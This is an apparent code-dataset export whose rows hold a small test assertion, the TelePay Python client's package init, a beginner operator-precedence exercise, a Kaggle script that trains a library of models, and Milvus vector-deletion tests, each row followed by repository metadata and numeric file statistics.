assert add_2(3) == 5 | 15.789474 | 46 | 0.566667 | 48 | 300 | 3.416667 | 0.375 | 0.097561 | 0.182927 | 0.310976 | 0.707317 | 0.707317 | 0.707317 | 0.707317 | 0.707317 | 0.707317 | 0 | 0.048889 | 0.25 | 300 | 19 | 47 | 15.789474 | 0.68 | 0.366667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 1 | 0.428571 | true | 0 | 0.142857 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
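# For reference, a `core` module consistent with these tests (inferred; the
# real core.py is not included here) could look like:
#
#     def add(a, b, z=0):
#         return a + b + z
#
#     def add_2(a):
#         return a + 2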
81815b1fe8d8cd27aa38d55354594b4e716e10fb | 466 | py | Python | telepay/v1/__init__.py | TelePay-cash/telepay-python | 199151326950bd66c7ec4cba9e7d6de580742c8f | [
"MIT"
] | 2 | 2022-03-20T12:26:17.000Z | 2022-03-29T22:14:29.000Z | telepay/v1/__init__.py | TelePay-cash/telepay-python | 199151326950bd66c7ec4cba9e7d6de580742c8f | [
"MIT"
] | 8 | 2022-03-30T08:23:20.000Z | 2022-03-30T08:26:29.000Z | telepay/v1/__init__.py | TelePay-cash/telepay-python | 199151326950bd66c7ec4cba9e7d6de580742c8f | [
"MIT"
] | null | null | null | from ._async.client import TelePayAsyncClient # noqa: F401
from ._sync.client import TelePaySyncClient # noqa: F401
from .auth import TelePayAuth # noqa: F401
from .errors import TelePayError # noqa: F401
from .models.account import Account # noqa: F401
from .models.assets import Assets # noqa: F401
from .models.invoice import Invoice # noqa: F401
from .models.wallets import Wallets # noqa: F401
from .webhooks import TelePayWebhookListener # noqa: F401
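# With the flat re-exports above, downstream code can import everything from
# the versioned package root, e.g. (usage sketch):
#
#     from telepay.v1 import TelePayAuth, TelePaySyncClient, TelePayError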
| 46.6 | 59 | 0.774678 | 60 | 466 | 5.983333 | 0.333333 | 0.200557 | 0.267409 | 0.200557 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068528 | 0.154506 | 466 | 9 | 60 | 51.777778 | 0.84264 | 0.2103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
81d858125b01369508997140ffd15bfa0ef9e112 | 47 | py | Python | python_3/aula07b.py | felipesch92/CursoEmVideo | df443e4771adc4506c96d8f419aa7acb97b28366 | [
"MIT"
] | null | null | null | python_3/aula07b.py | felipesch92/CursoEmVideo | df443e4771adc4506c96d8f419aa7acb97b28366 | [
"MIT"
] | null | null | null | python_3/aula07b.py | felipesch92/CursoEmVideo | df443e4771adc4506c96d8f419aa7acb97b28366 | [
"MIT"
] | null | null | null | print(5+3*2)
print(3*5+4**2)
print(3*(5+4)**2)
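# Expected output, following Python operator precedence (** binds tighter
# than *, which binds tighter than +; parentheses override both):
#   5 + 3*2     -> 5 + 6   -> 11
#   3*5 + 4**2  -> 15 + 16 -> 31
#   3*(5+4)**2  -> 3 * 81  -> 243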
| 11.75 | 17 | 0.553191 | 14 | 47 | 1.857143 | 0.357143 | 0.461538 | 0.538462 | 0.615385 | 0.730769 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.06383 | 47 | 3 | 18 | 15.666667 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 12 |
c49ab935f7784198fad409902cc192d0c2d1234a | 5,327 | py | Python | Crowdflower Search Results Relevance/src/model/generate_model_library.py | Tuanlase02874/Machine-Learning-Kaggle | c31651acd8f2407d8b60774e843a2527ce19b013 | [
"MIT"
] | 1 | 2018-07-11T16:20:43.000Z | 2018-07-11T16:20:43.000Z | Crowdflower Search Results Relevance/src/model/generate_model_library.py | Tuanlase02874/Machine-Learning-Kaggle | c31651acd8f2407d8b60774e843a2527ce19b013 | [
"MIT"
] | null | null | null | Crowdflower Search Results Relevance/src/model/generate_model_library.py | Tuanlase02874/Machine-Learning-Kaggle | c31651acd8f2407d8b60774e843a2527ce19b013 | [
"MIT"
] | null | null | null | import os
feat_names_all = [
## LSA_and_stats_feat_Jun09 (Low)
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_xgb_tree]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@kappa_xgb_linear]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_rf]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_svr]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_ridge]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_lasso]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@clf_skl_lr]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_libfm]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_keras_dnn]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_rgf]",
## LSA_svd150_and_Jaccard_coef_Jun14 (Low)
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_xgb_tree]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@kappa_xgb_linear]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_rf]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_svr]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_ridge]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_lasso]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@clf_skl_lr]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_libfm]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_keras_dnn]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_rgf]",
## svd100_and_bow_Jun23 (Low)
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_xgb_tree]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@kappa_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_rf]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_svr]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_ridge]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_lasso]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@clf_skl_lr]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_libfm]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_keras_dnn]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_rgf]",
## svd100_and_bow_Jun27 (High)
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@kappa_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@reg_skl_ridge]",
]
feat_names = [
## LSA_and_stats_feat_Jun09 (Low)
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_xgb_tree]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_ridge]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_lasso]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_rf]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_svr]",
## LSA_svd150_and_Jaccard_coef_Jun14 (Low)
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_svr]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_keras_dnn]",
## svd100_and_bow_Jun23 (Low)
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_svr]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_keras_dnn]",
## svd100_and_bow_Jun27 (High)
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@kappa_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@reg_skl_ridge]",
]
for feat_name in feat_names:
cmd = "python ./train_model.py %s" % feat_name
os.system( cmd ) | 57.902174 | 84 | 0.801952 | 860 | 5,327 | 4.317442 | 0.05814 | 0.198492 | 0.270671 | 0.198761 | 0.974414 | 0.974414 | 0.971452 | 0.962295 | 0.937786 | 0.91624 | 0 | 0.058525 | 0.037732 | 5,327 | 92 | 85 | 57.902174 | 0.665821 | 0.047118 | 0 | 0.56 | 0 | 0 | 0.905534 | 0.900395 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.013333 | 0 | 0.013333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
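The shell-out loop above works, but the feature names contain characters ([ and @) that a shell may reinterpret. A safer sketch using subprocess with an argument list, assuming train_model.py's command-line interface is unchanged:

import subprocess

for feat_name in feat_names:
    # no shell involved, so the bracket-heavy names pass through verbatim
    subprocess.check_call(["python", "./train_model.py", feat_name])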
c4a810ed99b9ea79a590b476eeb94ebf18141b4d | 22,401 | py | Python | tests/milvus_python_test/test_delete_vectors.py | yamasite/milvus | ee3a65a811b5487a92b39418540780fd19f378dc | [
"Apache-2.0"
] | null | null | null | tests/milvus_python_test/test_delete_vectors.py | yamasite/milvus | ee3a65a811b5487a92b39418540780fd19f378dc | [
"Apache-2.0"
] | null | null | null | tests/milvus_python_test/test_delete_vectors.py | yamasite/milvus | ee3a65a811b5487a92b39418540780fd19f378dc | [
"Apache-2.0"
] | 1 | 2022-02-28T08:43:42.000Z | 2022-02-28T08:43:42.000Z | import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from milvus import IndexType, MetricType
from utils import *
dim = 128
index_file_size = 10
collection_id = "test_delete"
DELETE_TIMEOUT = 60
nprobe = 1
epsilon = 0.001
tag = "1970-01-01"
top_k = 1
nb = 6000
class TestDeleteBase:
"""
******************************************************************
The following cases are used to test `delete_by_id` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] not in [IndexType.IVF_SQ8, IndexType.IVFLAT, IndexType.FLAT, IndexType.IVF_PQ, IndexType.HNSW]:
pytest.skip("Only support index_type: flat/ivf_flat/ivf_sq8/hnsw/ivf_pq")
else:
pytest.skip("Only support CPU mode")
return request.param
def test_delete_vector_search(self, connect, collection, get_simple_index):
'''
target: test delete vector
method: add vector and delete
expected: status ok, vector deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.delete_by_id(collection, ids)
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, vector, params=search_param)
logging.getLogger().info(res)
assert status.OK()
assert len(res) == 0
def test_delete_vector_multi_same_ids(self, connect, collection, get_simple_index):
'''
target: test delete vector, with some same ids
method: add vector and delete
expected: status ok, vector deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vectors = gen_vectors(nb, dim)
connect.add_vectors(collection, vectors, ids=[1 for i in range(nb)])
status = connect.flush([collection])
# Bloom filter error
assert status.OK()
status = connect.delete_by_id(collection, [1])
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, [vectors[0]], params=search_param)
logging.getLogger().info(res)
assert status.OK()
assert len(res) == 0
def test_delete_vector_collection_count(self, connect, collection):
'''
target: test delete vector
method: add vector and delete
expected: status ok, vector deleted
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.delete_by_id(collection, ids)
assert status.OK()
status = connect.flush([collection])
status, res = connect.count_collection(collection)
assert status.OK()
assert res == 0
def test_delete_vector_collection_count_no_flush(self, connect, collection):
'''
target: test delete vector
        method: add vector and delete, no flush (using auto flush)
expected: status ok, vector deleted
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.delete_by_id(collection, ids)
assert status.OK()
time.sleep(2)
status, res = connect.count_collection(collection)
assert status.OK()
assert res == 0
    def test_delete_vector_id_not_existed(self, connect, collection, get_simple_index):
'''
target: test delete vector, params vector_id not existed
method: add vector and delete
expected: status ok, search with vector have result
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.delete_by_id(collection, [0])
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, vector, params=search_param)
assert status.OK()
assert res[0][0].id == ids[0]
def test_delete_vector_collection_not_existed(self, connect, collection):
'''
target: test delete vector, params collection_name not existed
method: add vector and delete
expected: status not ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
collection_new = gen_unique_str()
status = connect.delete_by_id(collection_new, [0])
assert not status.OK()
def test_add_vectors_delete_vector(self, connect, collection, get_simple_index):
'''
method: add vectors and delete
expected: status ok, vectors deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.flush([collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(res)
assert res[0][0].distance > epsilon
assert res[1][0].distance < epsilon
assert res[1][0].id == ids[1]
assert res[2][0].distance > epsilon
def test_create_index_after_delete(self, connect, collection, get_simple_index):
'''
method: add vectors and delete, then create index
expected: status ok, vectors deleted, index created
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
status = connect.flush([collection])
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(res)
logging.getLogger().info(ids[0])
logging.getLogger().info(ids[1])
logging.getLogger().info(ids[-1])
assert res[0][0].id != ids[0]
assert res[1][0].id == ids[1]
assert res[2][0].id != ids[-1]
def test_add_vector_after_delete(self, connect, collection, get_simple_index):
'''
method: add vectors and delete, then add vector
expected: status ok, vectors deleted, vector added
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.flush([collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
status = connect.flush([collection])
status, tmp_ids = connect.add_vectors(collection, [vectors[0], vectors[-1]])
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(res)
assert res[0][0].id == tmp_ids[0]
assert res[0][0].distance < epsilon
assert res[1][0].distance < epsilon
assert res[2][0].id == tmp_ids[-1]
assert res[2][0].distance < epsilon
    def test_delete_multiple_times(self, connect, collection):
        '''
        method: add vectors and delete ids several times
expected: status ok, vectors deleted, and status ok for next delete operation
'''
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
status = connect.flush([collection])
for i in range(10):
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
    def test_delete_no_flush_multiple_times(self, connect, collection):
        '''
        method: add vectors and delete ids several times
expected: status ok, vectors deleted, and status ok for next delete operation
'''
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
for i in range(10):
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
class TestDeleteIndexedVectors:
"""
******************************************************************
The following cases are used to test `delete_by_id` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] not in [IndexType.IVF_SQ8, IndexType.IVFLAT, IndexType.FLAT, IndexType.IVF_PQ, IndexType.HNSW]:
pytest.skip("Only support index_type: flat/ivf_flat/ivf_sq8")
else:
pytest.skip("Only support CPU mode")
return request.param
def test_delete_vectors_after_index_created_search(self, connect, collection, get_simple_index):
'''
target: test delete vector after index created
method: add vector, create index and delete vector
expected: status ok, vector deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status = connect.delete_by_id(collection, ids)
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, vector, params=search_param)
logging.getLogger().info(res)
assert status.OK()
assert len(res) == 0
def test_add_vectors_delete_vector(self, connect, collection, get_simple_index):
'''
method: add vectors and delete
expected: status ok, vectors deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(ids[0])
logging.getLogger().info(ids[1])
logging.getLogger().info(ids[-1])
logging.getLogger().info(res)
assert res[0][0].id != ids[0]
assert res[1][0].id == ids[1]
assert res[2][0].id != ids[-1]
class TestDeleteBinary:
"""
******************************************************************
The following cases are used to test `delete_by_id` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_delete_vector_search(self, connect, jac_collection, get_simple_index):
'''
target: test delete vector
method: add vector and delete
expected: status ok, vector deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
tmp, vector = gen_binary_vectors(1, dim)
status, ids = connect.add_vectors(jac_collection, vector)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
status = connect.delete_by_id(jac_collection, ids)
assert status.OK()
status = connect.flush([jac_collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(jac_collection, top_k, vector, params=search_param)
logging.getLogger().info(res)
assert status.OK()
assert len(res) == 0
# TODO: soft delete
def test_delete_vector_collection_count(self, connect, jac_collection):
'''
target: test delete vector
method: add vector and delete
expected: status ok, vector deleted
'''
tmp, vector = gen_binary_vectors(1, dim)
status, ids = connect.add_vectors(jac_collection, vector)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
status = connect.delete_by_id(jac_collection, ids)
assert status.OK()
status = connect.flush([jac_collection])
status, res = connect.count_collection(jac_collection)
assert status.OK()
assert res == 0
    def test_delete_vector_id_not_existed(self, connect, jac_collection, get_simple_index):
'''
target: test delete vector, params vector_id not existed
method: add vector and delete
expected: status ok, search with vector have result
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
tmp, vector = gen_binary_vectors(1, dim)
status, ids = connect.add_vectors(jac_collection, vector)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
status = connect.delete_by_id(jac_collection, [0])
assert status.OK()
        status = connect.flush([jac_collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(jac_collection, top_k, vector, params=search_param)
assert status.OK()
assert res[0][0].id == ids[0]
def test_delete_vector_collection_not_existed(self, connect, jac_collection):
'''
target: test delete vector, params collection_name not existed
method: add vector and delete
expected: status not ok
'''
tmp, vector = gen_binary_vectors(1, dim)
status, ids = connect.add_vectors(jac_collection, vector)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
collection_new = gen_unique_str()
status = connect.delete_by_id(collection_new, [0])
assert not status.OK()
def test_add_vectors_delete_vector(self, connect, jac_collection, get_simple_index):
'''
method: add vectors and delete
expected: status ok, vectors deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
tmp, vectors = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(jac_collection, vectors)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(jac_collection, delete_ids)
assert status.OK()
status = connect.flush([jac_collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(jac_collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(res)
assert res[0][0].id != ids[0]
assert res[1][0].id == ids[1]
assert res[2][0].id != ids[-1]
def test_add_after_delete_vector(self, connect, jac_collection, get_simple_index):
'''
method: add vectors and delete, add
expected: status ok, vectors added
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
tmp, vectors = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(jac_collection, vectors)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(jac_collection, delete_ids)
assert status.OK()
status = connect.flush([jac_collection])
status, tmp_ids = connect.add_vectors(jac_collection, [vectors[0], vectors[-1]])
assert status.OK()
status = connect.flush([jac_collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(jac_collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(res)
assert res[0][0].id == tmp_ids[0]
assert res[1][0].id == ids[1]
assert res[2][0].id == tmp_ids[-1]
class TestDeleteIdsInvalid(object):
single_vector = gen_single_vector(dim)
"""
    Test deleting vectors with invalid ids
"""
@pytest.fixture(
scope="function",
params=gen_invalid_vector_ids()
)
def gen_invalid_id(self, request):
yield request.param
@pytest.mark.level(1)
def test_delete_vector_id_invalid(self, connect, collection, gen_invalid_id):
invalid_id = gen_invalid_id
with pytest.raises(Exception) as e:
status = connect.delete_by_id(collection, [invalid_id])
@pytest.mark.level(2)
def test_delete_vector_ids_invalid(self, connect, collection, gen_invalid_id):
invalid_id = gen_invalid_id
with pytest.raises(Exception) as e:
status = connect.delete_by_id(collection, [1, invalid_id])
class TestCollectionNameInvalid(object):
"""
    Test deleting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_delete_vectors_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
status = connect.delete_by_id(collection_name, [1])
assert not status.OK()
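# Canonical delete-and-verify flow distilled from the cases above (a sketch,
# not a test; it reuses only client calls already exercised in this module):
def _delete_and_verify_sketch(connect, collection, vectors, search_param):
    status, ids = connect.add_vectors(collection, vectors)
    assert status.OK()
    connect.flush([collection])        # make the insert visible
    status = connect.delete_by_id(collection, ids)
    assert status.OK()
    connect.flush([collection])        # apply the delete before searching
    status, res = connect.search_vectors(collection, top_k, vectors,
                                         params=search_param)
    assert status.OK() and len(res) == 0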
